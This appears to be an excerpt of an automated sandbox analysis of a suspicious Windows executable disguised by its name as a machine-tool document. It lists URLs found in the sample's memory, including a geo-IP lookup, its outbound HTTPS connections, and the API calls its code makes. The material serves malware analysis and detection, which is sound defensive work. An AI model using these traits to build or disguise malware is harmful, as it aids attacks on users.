Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000363FF000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/v104
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1488388248.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5957730612.00000000059B8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036372000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003637A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/191.96.150.187$
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com.txt
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com.txt/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com.txtD
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.eicar.org/eicar.com;
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.00000000364C3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.000000003640B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037545000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037593000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037437000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037370000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.000000003757B000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373B3000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037206000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037358000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=eicar
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000003.1457512860.00000000059AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037364000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.0000000037587000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5970021070.00000000373C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036325000.00000004.00000800.00020000.00000000.sdmp, SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe, 0000000B.00000002.5968030278.0000000036316000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.office.com/
Source: unknown HTTPS traffic detected: 142.250.80.46:443 -> 192.168.11.20:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.65.225:443 -> 192.168.11.20:49709 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49720 version: TLS 1.2
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_00405054 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard, 0_2_00405054
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 0_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004030D9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_004030D9 EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 11_2_004030D9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C891A9 11_2_38C891A9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8A9A0 11_2_38C8A9A0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C82DA2 11_2_38C82DA2
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C856A7 11_2_38C856A7
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C856B8 11_2_38C856B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C891B8 11_2_38C891B8
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8E7B9 11_2_38C8E7B9
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C804BF 11_2_38C804BF
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C866B0 11_2_38C866B0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8BCB0 11_2_38C8BCB0
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C836B7 11_2_38C836B7
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C85B48 11_2_38C85B48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C89B48 11_2_38C89B48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C83B48 11_2_38C83B48
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C80040 11_2_38C80040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C87040 11_2_38C87040
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8C640 11_2_38C8C640
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8F147 11_2_38C8F147
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C83B58 11_2_38C83B58
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8F158 11_2_38C8F158
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8AE59 11_2_38C8AE59
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C81B5E 11_2_38C81B5E
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8D95F 11_2_38C8D95F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8C650 11_2_38C8C650
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C80950 11_2_38C80950
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C88350 11_2_38C88350
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C81B68 11_2_38C81B68
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8AE68 11_2_38C8AE68
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C84468 11_2_38C84468
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C86B68 11_2_38C86B68
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8126F 11_2_38C8126F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8966F 11_2_38C8966F
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C80960 11_2_38C80960
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C88360 11_2_38C88360
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C84478 11_2_38C84478
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C86B78 11_2_38C86B78
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C82478 11_2_38C82478
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8C178 11_2_38C8C178
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C84908 11_2_38C84908
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C87508 11_2_38C87508
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8CB09 11_2_38C8CB09
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8E300 11_2_38C8E300
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8A000 11_2_38C8A000
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C82907 11_2_38C82907
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C82918 11_2_38C82918
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8CB18 11_2_38C8CB18
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C88818 11_2_38C88818
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C81710 11_2_38C81710
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8A010 11_2_38C8A010
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8F610 11_2_38C8F610
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C80012 11_2_38C80012
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C85228 11_2_38C85228
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C88828 11_2_38C88828
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C83228 11_2_38C83228
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8DE29 11_2_38C8DE29
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8F620 11_2_38C8F620
Source: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe Code function: 11_2_38C8B321 11_2_38C8B321
